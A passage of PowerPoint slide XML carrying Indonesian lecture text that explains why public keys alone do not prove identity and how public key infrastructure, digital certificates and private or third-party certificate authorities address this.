            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemiliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada e-commerce. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>yakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belanja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar-benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh orang yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diklaimnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>? Fakta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjamin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebenarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhubungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>yakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memodifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pikir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh server yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (PKI) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuktikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>katakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam PKI, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeluarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempublikasikannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keabsahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijamin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otoritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (CA).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>PKI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> internal. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikeluarkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis-ke-bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hubungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepercayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
